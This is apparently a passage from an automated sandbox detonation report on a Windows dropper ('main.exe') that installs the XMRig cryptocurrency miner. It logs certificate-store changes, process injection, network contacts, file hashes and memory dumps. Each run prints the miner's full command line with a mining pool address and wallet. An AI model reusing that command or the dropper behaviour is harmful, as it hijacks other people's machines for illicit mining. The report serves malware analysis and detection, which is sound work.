8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 456 wrote to memory of 4060 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 456 wrote to memory of 4060 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4060-16-0x0000028955FA0000-0x0000028955FC0000-memory.dmp
memory/4060-17-0x00007FFCE7B70000-0x00007FFCE7EC5000-memory.dmp
memory/4060-18-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-19-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-20-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-21-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-22-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-23-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-24-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-25-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-26-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-27-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-28-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-29-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-30-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-31-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-32-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-33-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-34-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-35-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-36-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-37-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-38-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-39-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-40-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-41-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-42-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-43-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-44-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-45-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-46-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-47-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-48-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-49-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-50-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-51-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-52-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-53-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-54-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-55-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-56-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-57-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-58-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-59-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-60-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-61-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-62-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-63-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-64-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-65-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-66-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-67-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-68-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-69-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-70-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-71-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-72-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-73-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-74-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-75-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-76-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-77-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-78-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-79-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
memory/4060-80-0x00007FF65E5A0000-0x00007FF65F0A3000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:33
Platform
win10v2004-20240226-en
Max time kernel
1796s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1556 wrote to memory of 3568 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1556 wrote to memory of 3568 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5024 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1404 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 172.217.169.74:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3568-16-0x0000029471540000-0x0000029471560000-memory.dmp
memory/3568-17-0x0000029472D50000-0x0000029472D70000-memory.dmp
memory/3568-18-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-19-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-20-0x0000029472D70000-0x0000029472D90000-memory.dmp
memory/3568-21-0x0000029472D90000-0x0000029472DB0000-memory.dmp
memory/3568-22-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-23-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-24-0x0000029472D70000-0x0000029472D90000-memory.dmp
memory/3568-26-0x0000029472D90000-0x0000029472DB0000-memory.dmp
memory/3568-25-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-27-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-28-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-29-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-30-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-31-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-32-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-33-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-34-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-35-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-36-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-37-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-38-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-39-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-40-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-41-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-42-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-43-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-44-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-45-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-46-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-47-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-48-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-49-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-50-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-51-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-52-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-53-0x00007FF645030000-0x00007FF645B33000-memory.dmp
